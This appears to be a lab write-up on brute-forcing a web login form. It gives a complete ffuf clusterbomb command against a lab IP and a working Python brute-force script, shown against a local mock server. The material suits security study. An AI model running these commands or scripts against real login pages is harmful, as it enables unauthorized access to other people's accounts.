Brute Force

Using the valid_usernames.txt file I generated in the previous task, I can now attempt a brute force attack against the login page (http://10.10.13.84/customers/login). A brute force attack is an automated process that tries a list of commonly used passwords against either a single username or, as in this case, a list of usernames.

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.13.84/customers/login -fc 200

This ffuf command is a little different to the previous one. Previously I used the FUZZ keyword to select where in the request the data from the wordlist would be inserted, but because I'm using multiple wordlists, I have to define my own keywords. In this instance I chose W1 for the list of valid usernames and W2 for the list of passwords I will try. The multiple wordlists are again specified with the -w argument, separated by a comma, with each wordlist's keyword appended after a colon. With two wordlists ffuf defaults to clusterbomb mode, so every username is tried against every password. For a positive match I'm using the -fc argument to filter out responses with an HTTP status code of 200: a failed login re-renders the form with a 200, so only requests that return a different status code (such as a redirect on a successful login) are shown in the output.
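The same clusterbomb brute force written out in Python, as an added example rather than code from the original write-up. It POSTs every username against every password, does not follow redirects, and keeps only the pairs whose status code is not 200, which is exactly what the -fc 200 filter does. Because it has to run offline, the target is a constructed mock login server on localhost that returns 302 for one hard-coded credential pair and 200 otherwise; the username and password lists are short constructed samples standing in for valid_usernames.txt and the SecLists top-100 list.

```python
"""Clusterbomb credential brute force against a form login, mirroring
ffuf -w users:W1,passwords:W2 -d "username=W1&password=W2" -fc 200.
Added example, not the original write-up's code. The target here is a
constructed local mock; the real target was http://10.10.13.84/customers/login."""
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from itertools import product

# Constructed sample data: a real run would read valid_usernames.txt and
# the SecLists top-100 password list instead.
VALID_USERNAMES = ["steve", "robert", "simon"]
PASSWORDS = ["123456", "password", "letmein", "qwerty"]

# Constructed mock: the single credential pair the fake login accepts.
MOCK_CREDS = {"steve": "letmein"}


class MockLogin(BaseHTTPRequestHandler):
    """Behaves like the target login form: 302 on success, 200 on failure."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        pw = form.get("password", [""])[0]
        if self.path == "/customers/login" and MOCK_CREDS.get(user) == pw:
            self.send_response(302)
            self.send_header("Location", "/customers/")
            self.end_headers()
        else:
            self.send_response(200)  # form re-rendered with an error message
            self.end_headers()
            self.wfile.write(b"Invalid username or password")

    def log_message(self, *args):  # keep the server quiet
        pass


def start_mock_server():
    """Start the mock login server on a free localhost port in a daemon thread."""
    server = HTTPServer(("127.0.0.1", 0), MockLogin)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects: like ffuf, report the raw status of each response."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def attempt_login(url, username, password):
    """POST one username/password pair and return the HTTP status code."""
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(
        url, data=data, method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(req) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code  # 3xx/4xx/5xx surface here once redirects are not followed


def brute_force(url, usernames, passwords, filter_codes=(200,)):
    """Clusterbomb mode: every username against every password, keeping only
    the pairs whose status code is not in filter_codes (ffuf's -fc)."""
    hits = []
    for user, pw in product(usernames, passwords):
        code = attempt_login(url, user, pw)
        if code not in filter_codes:
            hits.append((user, pw, code))
    return hits


if __name__ == "__main__":
    srv = start_mock_server()
    target = f"http://127.0.0.1:{srv.server_port}/customers/login"
    for user, pw, code in brute_force(target, VALID_USERNAMES, PASSWORDS):
        print(f"[{code}] {user}:{pw}")
    srv.shutdown()
```

Against the mock the only line printed is [302] steve:letmein, the one pair that does not return a 200. Not following redirects is the important detail: a client that silently follows the 302 would land on a 200 page and the successful login would be filtered out along with the failures.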
